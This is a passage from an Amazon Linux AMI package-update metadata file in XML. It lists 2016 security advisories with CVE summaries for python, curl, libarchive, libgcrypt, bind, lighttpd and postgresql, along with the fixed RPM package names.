version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="perf" version="4.4.19" release="29.55.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.4.19-29.55.amzn1.i686.rpm</filename></package><package name="kernel-doc" version="4.4.19" release="29.55.amzn1" epoch="0" 
arch="noarch"><filename>Packages/kernel-doc-4.4.19-29.55.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-741</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-741: medium priority package update for python34 python27 python26</title><issued date="2016-09-01 18:00:00" /><updated date="2016-09-01 18:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1000110:
It was discovered that the Python CGIHandler class did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a Python CGI script to an attacker-controlled proxy via a malicious HTTP request.
1357334:
CVE-2016-1000110 Python CGIHandler: sets environmental variable based on user supplied Proxy request header
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000110" title="" id="CVE-2016-1000110" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-debuginfo" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.12" release="2.120.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.12-2.120.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.12-2.120.amzn1.i686.rpm</filename></package><package 
name="python27-tools" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.12" release="2.120.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.12-2.120.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-libs-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-tools-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-debuginfo-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-test-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.88.amzn1" epoch="0" arch="x86_64"><filename>Packages/python26-devel-2.6.9-2.88.amzn1.x86_64.rpm</filename></package><package name="python26-test" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-test-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-libs" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-libs-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-debuginfo" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-debuginfo-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-devel" version="2.6.9" release="2.88.amzn1" epoch="0" 
arch="i686"><filename>Packages/python26-devel-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26-tools" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-tools-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python26" version="2.6.9" release="2.88.amzn1" epoch="0" arch="i686"><filename>Packages/python26-2.6.9-2.88.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-tools-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-libs" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-libs-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-debuginfo-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-devel-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-test-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34" version="3.4.3" release="1.33.amzn1" epoch="0" arch="x86_64"><filename>Packages/python34-3.4.3-1.33.amzn1.x86_64.rpm</filename></package><package name="python34-devel" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-devel-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-debuginfo" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-debuginfo-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-test" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-test-3.4.3-1.33.amzn1.i686.rpm</filename></package><package 
name="python34-libs" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-libs-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34-tools" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-tools-3.4.3-1.33.amzn1.i686.rpm</filename></package><package name="python34" version="3.4.3" release="1.33.amzn1" epoch="0" arch="i686"><filename>Packages/python34-3.4.3-1.33.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-742</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-742: low priority package update for curl</title><issued date="2016-09-27 10:30:00" /><updated date="2016-09-27 10:30:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7167:
1375906:
CVE-2016-7167 curl: escape and unescape integer overflows
CVE-2016-7141:
1373229:
CVE-2016-7141 curl: Incorrect reuse of client certificates
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7141" title="" id="CVE-2016-7141" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7167" title="" id="CVE-2016-7167" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl-debuginfo" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.47.1-8.65.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.47.1-8.65.amzn1.i686.rpm</filename></package><package name="curl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.47.1-8.65.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.47.1-8.65.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.47.1" release="8.65.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.47.1-8.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-743</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-743: important priority package update for libarchive</title><issued date="2016-09-27 10:30:00" /><updated 
date="2016-09-27 10:30:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-7166:
A vulnerability was found in libarchive. A specially crafted gzip file can cause libarchive to allocate memory without limit, eventually leading to a crash.
1347086:
CVE-2016-7166 libarchive: Denial of service using a crafted gzip file
CVE-2016-6250:
A vulnerability was found in libarchive. An attempt to create an ISO9660 volume with 2GB or 4GB filenames could cause the application to crash.
1347085:
CVE-2016-6250 libarchive: Buffer overflow when writing large iso9660 containers
CVE-2016-5844:
Undefined behavior (signed integer overflow) was discovered in libarchive, in the ISO parser. A crafted file could potentially cause denial of service.
1350280:
CVE-2016-5844 libarchive: undefined behaviour (integer overflow) in iso parser
CVE-2016-5418:
A flaw was found in the way libarchive handled hardlink archive entries of non-zero size. Combined with flaws in libarchive&#039;s file system sandboxing, this issue could cause an application using libarchive to overwrite arbitrary files with arbitrary data from the archive.
1362601:
CVE-2016-5418 libarchive: Archive Entry with type 1 (hardlink), but has a non-zero data size file overwrite
CVE-2016-4809:
A vulnerability was found in libarchive. A specially crafted cpio archive containing a symbolic link to a ridiculously large target path can cause memory allocation to fail, resulting in any attempt to view or extract the archive crashing.
1347084:
CVE-2016-4809 libarchive: Memory allocate error with symbolic links in cpio archives
CVE-2016-4302:
A vulnerability was found in libarchive&#039;s handling of RAR archives. A specially crafted RAR file can cause a heap overflow, potentially leading to code execution in the context of the application.
1348444:
CVE-2016-4302 libarchive: Heap buffer overflow in the Rar decompression functionality
CVE-2016-4300:
A vulnerability was found in libarchive&#039;s handling of 7zip data. A specially crafted 7zip file can cause an integer overflow resulting in memory corruption that can lead to code execution.
1348439:
CVE-2016-4300 libarchive: Heap buffer overflow vulnerability in the 7zip read_SubStreamsInfo
CVE-2016-1541:
A vulnerability was found in libarchive. A specially crafted zip file can provide an incorrect compressed size, which may allow an attacker to place arbitrary code on the heap and execute it in the context of the application.
1334211:
CVE-2016-1541 libarchive: zip_read_mac_metadata() heap-based buffer overflow
CVE-2015-8934:
A vulnerability was found in libarchive. A specially crafted RAR file could cause the application to read memory beyond the end of the decompression buffer.
1349229:
CVE-2015-8934 libarchive: out of bounds heap read in RAR parser
CVE-2015-8932:
Undefined behavior (invalid left shift) was discovered in libarchive, in how Compress streams are identified. This could cause certain files to be mistakenly identified as Compress archives and fail to read.
1348780:
CVE-2015-8932 libarchive: Undefined behavior / invalid shiftleft in TAR parser
CVE-2015-8931:
Undefined behavior (signed integer overflow) was discovered in libarchive, in the MTREE parser&#039;s calculation of maximum and minimum dates. A crafted mtree file could potentially cause denial of service.
1348779:
CVE-2015-8931 libarchive: Undefined behavior (signed integer overflow) in mtree parser
CVE-2015-8930:
A vulnerability was found in libarchive. A specially crafted ISO file could cause the application to consume resources until it hit a memory limit, leading to a crash or denial of service.
1349204:
CVE-2015-8930 libarchive: Endless loop in ISO parser
CVE-2015-8928:
A vulnerability was found in libarchive. A specially crafted MTREE file could cause a limited out-of-bounds read, potentially disclosing contents of application memory.
1348429:
CVE-2015-8928 libarchive: Heap out of bounds read in mtree parser
CVE-2015-8926:
A vulnerability was found in libarchive. A specially crafted RAR file could cause the application to disclose a 128k block of memory from an uncontrolled location.
1348424:
CVE-2015-8926 libarchive: NULL pointer access in RAR parser
CVE-2015-8925:
A vulnerability was found in libarchive. A specially crafted MTREE file could cause a small out-of-bounds read, potentially disclosing a small amount of application memory.
1348423:
CVE-2015-8925 libarchive: Unclear invalid memory read in mtree parser
CVE-2015-8924:
A vulnerability was found in libarchive. A specially crafted TAR file could trigger an out-of-bounds read, potentially causing the application to disclose a small amount of application memory.
1348421:
CVE-2015-8924 libarchive: Heap out of bounds read in TAR parser
CVE-2015-8923:
A vulnerability was found in libarchive. A specially crafted ZIP file could cause a few bytes of application memory in a 256-byte region to be disclosed.
1348773:
CVE-2015-8923 libarchive: Unclear crashes in ZIP parser
CVE-2015-8922:
A vulnerability was found in libarchive. A specially crafted 7Z file could trigger a NULL pointer dereference, causing the application to crash.
1348419:
CVE-2015-8922 libarchive: NULL pointer access in 7z parser
CVE-2015-8921:
A vulnerability was found in libarchive. A specially crafted mtree file could cause libarchive to read beyond a statically declared structure, potentially disclosing application memory.
1348772:
CVE-2015-8921 libarchive: Global out of bounds read in mtree parser
CVE-2015-8920:
A vulnerability was found in libarchive. A specially crafted AR archive could cause the application to read a single byte of application memory, potentially disclosing it to the attacker.
1348416:
CVE-2015-8920 libarchive: Stack out of bounds read in ar parser
CVE-2015-8919:
A vulnerability was found in libarchive. A specially crafted LZA/LZH file could cause a small out-of-bounds read, potentially disclosing a few bytes of application memory.
1348414:
CVE-2015-8919 libarchive: Heap out of bounds read in LHA/LZH parser
CVE-2015-8917:
A vulnerability was found in libarchive. A specially crafted CAB file could cause the application to dereference a NULL pointer, leading to a crash.
1348413:
CVE-2015-8917 libarchive: NULL pointer access in CAB parser
CVE-2015-8916:
A vulnerability was found in libarchive. A specially crafted RAR file could cause the application to dereference a NULL pointer, leading to a crash.
1348412:
CVE-2015-8916 libarchive: NULL pointer access in RAR parser through bsdtar
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8916" title="" id="CVE-2015-8916" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8917" title="" id="CVE-2015-8917" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8919" title="" id="CVE-2015-8919" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8920" title="" id="CVE-2015-8920" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8921" title="" id="CVE-2015-8921" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8922" title="" id="CVE-2015-8922" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8923" title="" id="CVE-2015-8923" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8924" title="" id="CVE-2015-8924" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8925" title="" id="CVE-2015-8925" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8926" title="" id="CVE-2015-8926" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8928" title="" id="CVE-2015-8928" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8930" title="" id="CVE-2015-8930" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8931" title="" id="CVE-2015-8931" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8932" title="" id="CVE-2015-8932" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-8934" title="" id="CVE-2015-8934" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1541" title="" id="CVE-2016-1541" type="cve" /><reference 
href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4300" title="" id="CVE-2016-4300" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4302" title="" id="CVE-2016-4302" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4809" title="" id="CVE-2016-4809" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5418" title="" id="CVE-2016-5418" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5844" title="" id="CVE-2016-5844" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6250" title="" id="CVE-2016-6250" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-7166" title="" id="CVE-2016-7166" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bsdtar" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdtar-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-devel-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/bsdcpio-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="10.11.amzn1" epoch="0" arch="x86_64"><filename>Packages/libarchive-debuginfo-3.1.2-10.11.amzn1.x86_64.rpm</filename></package><package name="libarchive-devel" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-devel-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="bsdtar" version="3.1.2" 
release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/bsdtar-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="libarchive" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="bsdcpio" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/bsdcpio-3.1.2-10.11.amzn1.i686.rpm</filename></package><package name="libarchive-debuginfo" version="3.1.2" release="10.11.amzn1" epoch="0" arch="i686"><filename>Packages/libarchive-debuginfo-3.1.2-10.11.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-744</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-744: medium priority package update for libgcrypt gnupg</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-6313:
1366105:
CVE-2016-6313 libgcrypt: PRNG output is predictable
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6313" title="" id="CVE-2016-6313" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libgcrypt-devel" version="1.5.3" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-devel-1.5.3-12.19.amzn1.x86_64.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-1.5.3-12.19.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.19.amzn1" epoch="0" arch="x86_64"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.19.amzn1.x86_64.rpm</filename></package><package name="libgcrypt-devel" version="1.5.3" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-devel-1.5.3-12.19.amzn1.i686.rpm</filename></package><package name="libgcrypt" version="1.5.3" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-1.5.3-12.19.amzn1.i686.rpm</filename></package><package name="libgcrypt-debuginfo" version="1.5.3" release="12.19.amzn1" epoch="0" arch="i686"><filename>Packages/libgcrypt-debuginfo-1.5.3-12.19.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.19-1.28.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.19" release="1.28.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.19-1.28.amzn1.x86_64.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.19" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.19-1.28.amzn1.i686.rpm</filename></package><package name="gnupg" version="1.4.19" release="1.28.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.19-1.28.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" 
version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-745</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-745: medium priority package update for bind</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-2775:
It was found that the lightweight resolver could crash due to an error when asked to resolve a query name which, when combined with a search list entry, exceeds the maximum allowable length. A remote attacker could use this flaw to crash lwresd or named when using the &quot;lwres&quot; statement in named.conf.
1357803:
CVE-2016-2775 bind: Too long query name causes segmentation fault in lwresd
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2775" title="" id="CVE-2016-2775" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="bind-libs" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-libs-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-devel-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-utils-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="x86_64"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.47.amzn1.x86_64.rpm</filename></package><package name="bind-libs" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-libs-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-sdb" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-sdb-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-devel" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" 
arch="i686"><filename>Packages/bind-devel-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-debuginfo" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-debuginfo-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-utils" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-utils-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package><package name="bind-chroot" version="9.8.2" release="0.37.rc1.47.amzn1" epoch="32" arch="i686"><filename>Packages/bind-chroot-9.8.2-0.37.rc1.47.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-746</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-746: important priority package update for lighttpd</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-1000212:
It was discovered that lighttpd did not properly protect against the HTTP_PROXY variable name clash in a CGI context. A remote attacker could possibly use this flaw to redirect HTTP requests performed by a CGI script to an attacker-controlled proxy via a malicious HTTP request.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-1000212" title="" id="CVE-2016-1000212" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lighttpd-mod_mysql_vhost" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-mod_geoip-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-fastcgi-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.41" release="1.34.amzn1" epoch="0" arch="x86_64"><filename>Packages/lighttpd-debuginfo-1.4.41-1.34.amzn1.x86_64.rpm</filename></package><package name="lighttpd-debuginfo" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-debuginfo-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_geoip" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_geoip-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd-mod_mysql_vhost" version="1.4.41" release="1.34.amzn1" epoch="0" arch="i686"><filename>Packages/lighttpd-mod_mysql_vhost-1.4.41-1.34.amzn1.i686.rpm</filename></package><package name="lighttpd-fastcgi" version="1.4.41" release="1.34.amzn1" epoch="0" 
arch="i686"><filename>Packages/lighttpd-fastcgi-1.4.41-1.34.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2016-747</id><title>Amazon Linux AMI 2014.03 - ALAS-2016-747: medium priority package update for postgresql92 postgresql93 postgresql94</title><issued date="2016-09-15 19:00:00" /><updated date="2016-09-15 19:00:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2016-5424:
A flaw was found in the way PostgreSQL client programs handled database and role names containing newlines, carriage returns, double quotes, or backslashes. By crafting such an object name, roles with the CREATEDB or CREATEROLE option could escalate their privileges to superuser when a superuser next executes maintenance with a vulnerable client program.
1364002:
CVE-2016-5424 postgresql: privilege escalation via crafted database and role names
CVE-2016-5423:
A flaw was found in the way PostgreSQL server handled certain SQL statements containing CASE/WHEN commands. A remote, authenticated attacker could use a specially crafted SQL statement to cause PostgreSQL to crash or disclose a few bytes of server memory or possibly execute arbitrary code.
1364001:
CVE-2016-5423 postgresql: CASE/WHEN with inlining can cause untrusted pointer dereference
